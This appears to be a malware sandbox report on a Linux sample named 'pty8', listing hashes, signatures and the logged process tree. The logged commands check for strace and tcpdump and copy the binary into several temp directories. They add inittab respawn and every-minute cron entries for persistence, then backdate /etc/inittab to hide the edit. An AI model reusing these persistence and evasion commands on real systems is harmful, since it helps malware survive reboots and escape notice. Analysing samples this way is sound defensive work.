7c4e9e95a27147623ec5b3be81c76c131a0871d75f50b148b93e88ef6ee0b468

General

Target

pty8
Size

1.9MB
MD5

71a0b26e851ec57a16a0a8038f515ad6
SHA1

5907e161bd31cba0cd932253fa1e3b7590450b1f
SHA256

7c4e9e95a27147623ec5b3be81c76c131a0871d75f50b148b93e88ef6ee0b468
SHA512

c8fb784b28b691ac255cd1391bdcdf84f35d306c86b082df6376cdbfcd832bbc538db6eda041e0d14b8d99a769a5de3f7e2a734145df2414d38cd0cf98120adc

Score

5^/10

Malware Config

Signatures

Reads runtime system information 4 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp
/proc/filesystems	/proc/filesystems	cp

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
/tmp/pty8	/tmp/pty8	cp
/tmp/pty8	/tmp/pty8	cp
/tmp/pty8	/tmp/pty8	cp
/tmp/pty8	/tmp/pty8	cp

./pty8
./pty8
1⤵
PID:571
- /bin/sh
  sh -c "pidof -x strace > /dev/null"
  2⤵
  PID:572
- - /bin/pidof
    pidof -x strace
    3⤵
    PID:573
- /bin/sh
  sh -c "pidof -x tcpdump > /dev/null"
  2⤵
  PID:574
- - /bin/pidof
    pidof -x tcpdump
    3⤵
    PID:575
- /bin/sh
  sh -c "cat /etc/inittab | grep -v \"/tmp/pty8\" > /etc/inittab2"
  2⤵
  PID:578
- - /bin/cat
    cat /etc/inittab
    3⤵
    PID:581
- - /bin/grep
    grep -v /tmp/pty8
    3⤵
    PID:583
- /bin/sh
  sh -c "echo \"0:2345:respawn:/tmp/pty8\" >> /etc/inittab2"
  2⤵
  PID:586
- /bin/sh
  sh -c "cat /etc/inittab2 > /etc/inittab"
  2⤵
  PID:588
- - /bin/cat
    cat /etc/inittab2
    3⤵
    PID:590
- /bin/sh
  sh -c "rm -rf /etc/inittab2"
  2⤵
  PID:593
- - /bin/rm
    rm -rf /etc/inittab2
    3⤵
    PID:594
- /bin/sh
  sh -c "touch -acmr /bin/ls /etc/inittab"
  2⤵
  PID:595
- - /usr/bin/touch
    touch -acmr /bin/ls /etc/inittab
    3⤵
    PID:596

/bin/sh
sh -c "crontab -l | grep /tmp/pty8 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/pty8 > /dev/null 2>&1 &\") | crontab -"
1⤵
PID:579
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:582
- /bin/grep
  grep /tmp/pty8
  2⤵
  PID:585
- /bin/grep
  grep -v "no cron"
  2⤵
  PID:587
- /usr/bin/crontab
  crontab -
  2⤵
  PID:591

/bin/sh
sh -c "crontab -r"
1⤵
PID:580
- /usr/bin/crontab
  crontab -r
  2⤵
  PID:584

/usr/bin/crontab
crontab -l
1⤵
PID:592

/bin/sh
sh -c "cp -f /tmp/pty8 /dev/shm/pty8"
1⤵
PID:604
- /bin/cp
  cp -f /tmp/pty8 /dev/shm/pty8
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:605

/bin/sh
sh -c "/bin/uname -n"
1⤵
PID:603
- /bin/uname
  /bin/uname -n
  2⤵
  PID:606

/bin/sh
sh -c "cat /etc/inittab | grep -v \"/dev/shm/pty8\" > /etc/inittab2"
1⤵
PID:608
- /bin/grep
  grep -v /dev/shm/pty8
  2⤵
  PID:611
- /bin/cat
  cat /etc/inittab
  2⤵
  PID:609

/bin/sh
sh -c "crontab -l | grep /dev/shm/pty8 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/pty8 > /dev/null 2>&1 &\") | crontab -"
1⤵
PID:610
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:612
- /bin/grep
  grep /dev/shm/pty8
  2⤵
  PID:614
- /bin/grep
  grep -v "no cron"
  2⤵
  PID:616
- /usr/bin/crontab
  crontab -
  2⤵
  PID:619

/bin/sh
sh -c "echo \"0:2345:respawn:/dev/shm/pty8\" >> /etc/inittab2"
1⤵
PID:613

/bin/sh
sh -c "cat /etc/inittab2 > /etc/inittab"
1⤵
PID:615
- /bin/cat
  cat /etc/inittab2
  2⤵
  PID:617

/bin/sh
sh -c "rm -rf /etc/inittab2"
1⤵
PID:621
- /bin/rm
  rm -rf /etc/inittab2
  2⤵
  PID:622

/usr/bin/crontab
crontab -l
1⤵
PID:620

/bin/sh
sh -c "touch -acmr /bin/ls /etc/inittab"
1⤵
PID:623
- /usr/bin/touch
  touch -acmr /bin/ls /etc/inittab
  2⤵
  PID:624

/bin/sh
sh -c "cp -f /tmp/pty8 /var/tmp/pty8"
1⤵
PID:625
- /bin/cp
  cp -f /tmp/pty8 /var/tmp/pty8
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:626

/bin/sh
sh -c "cat /etc/inittab | grep -v \"/var/tmp/pty8\" > /etc/inittab2"
1⤵
PID:628
- /bin/cat
  cat /etc/inittab
  2⤵
  PID:630
- /bin/grep
  grep -v /var/tmp/pty8
  2⤵
  PID:631

/bin/sh
sh -c "crontab -l | grep /var/tmp/pty8 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/pty8 > /dev/null 2>&1 &\") | crontab -"
1⤵
PID:629
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:632
- /bin/grep
  grep /var/tmp/pty8
  2⤵
  PID:633
- /bin/grep
  grep -v "no cron"
  2⤵
  PID:635
- /usr/bin/crontab
  crontab -
  2⤵
  PID:639

/bin/sh
sh -c "echo \"0:2345:respawn:/var/tmp/pty8\" >> /etc/inittab2"
1⤵
PID:634

/bin/sh
sh -c "cat /etc/inittab2 > /etc/inittab"
1⤵
PID:636
- /bin/cat
  cat /etc/inittab2
  2⤵
  PID:638

/usr/bin/crontab
crontab -l
1⤵
PID:640

/bin/sh
sh -c "rm -rf /etc/inittab2"
1⤵
PID:641
- /bin/rm
  rm -rf /etc/inittab2
  2⤵
  PID:642

/bin/sh
sh -c "touch -acmr /bin/ls /etc/inittab"
1⤵
PID:643
- /usr/bin/touch
  touch -acmr /bin/ls /etc/inittab
  2⤵
  PID:644

/bin/sh
sh -c "cp -f /tmp/pty8 /var/lock/pty8"
1⤵
PID:645
- /bin/cp
  cp -f /tmp/pty8 /var/lock/pty8
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:646

/bin/sh
sh -c "cat /etc/inittab | grep -v \"/var/lock/pty8\" > /etc/inittab2"
1⤵
PID:648
- /bin/cat
  cat /etc/inittab
  2⤵
  PID:649
- /bin/grep
  grep -v /var/lock/pty8
  2⤵
  PID:651

/bin/sh
sh -c "crontab -l | grep /var/lock/pty8 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/pty8 > /dev/null 2>&1 &\") | crontab -"
1⤵
PID:650
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:652
- /bin/grep
  grep /var/lock/pty8
  2⤵
  PID:653
- /bin/grep
  grep -v "no cron"
  2⤵
  PID:655
- /usr/bin/crontab
  crontab -
  2⤵
  PID:659

/bin/sh
sh -c "echo \"0:2345:respawn:/var/lock/pty8\" >> /etc/inittab2"
1⤵
PID:654

/bin/sh
sh -c "cat /etc/inittab2 > /etc/inittab"
1⤵
PID:656
- /bin/cat
  cat /etc/inittab2
  2⤵
  PID:657

/usr/bin/crontab
crontab -l
1⤵
PID:660

/bin/sh
sh -c "rm -rf /etc/inittab2"
1⤵
PID:661
- /bin/rm
  rm -rf /etc/inittab2
  2⤵
  PID:662

/bin/sh
sh -c "touch -acmr /bin/ls /etc/inittab"
1⤵
PID:663
- /usr/bin/touch
  touch -acmr /bin/ls /etc/inittab
  2⤵
  PID:664

/bin/sh
sh -c "cp -f /tmp/pty8 /var/run/pty8"
1⤵
PID:665
- /bin/cp
  cp -f /tmp/pty8 /var/run/pty8
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:666

/bin/sh
sh -c "cat /etc/inittab | grep -v \"/var/run/pty8\" > /etc/inittab2"
1⤵
PID:668
- /bin/cat
  cat /etc/inittab
  2⤵
  PID:670
- /bin/grep
  grep -v /var/run/pty8
  2⤵
  PID:671

/bin/sh
sh -c "crontab -l | grep /var/run/pty8 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/pty8 > /dev/null 2>&1 &\") | crontab -"
1⤵
PID:669
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:672
- /bin/grep
  grep /var/run/pty8
  2⤵
  PID:674
- /bin/grep
  grep -v "no cron"
  2⤵
  PID:675
- /usr/bin/crontab
  crontab -
  2⤵
  PID:679

/bin/sh
sh -c "echo \"0:2345:respawn:/var/run/pty8\" >> /etc/inittab2"
1⤵
PID:673

/bin/sh
sh -c "cat /etc/inittab2 > /etc/inittab"
1⤵
PID:676
- /bin/cat
  cat /etc/inittab2
  2⤵
  PID:677

/bin/sh
sh -c "rm -rf /etc/inittab2"
1⤵
PID:681
- /bin/rm
  rm -rf /etc/inittab2
  2⤵
  PID:682

/usr/bin/crontab
crontab -l
1⤵
PID:680

/bin/sh
sh -c "touch -acmr /bin/ls /etc/inittab"
1⤵
PID:683
- /usr/bin/touch
  touch -acmr /bin/ls /etc/inittab
  2⤵
  PID:684

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads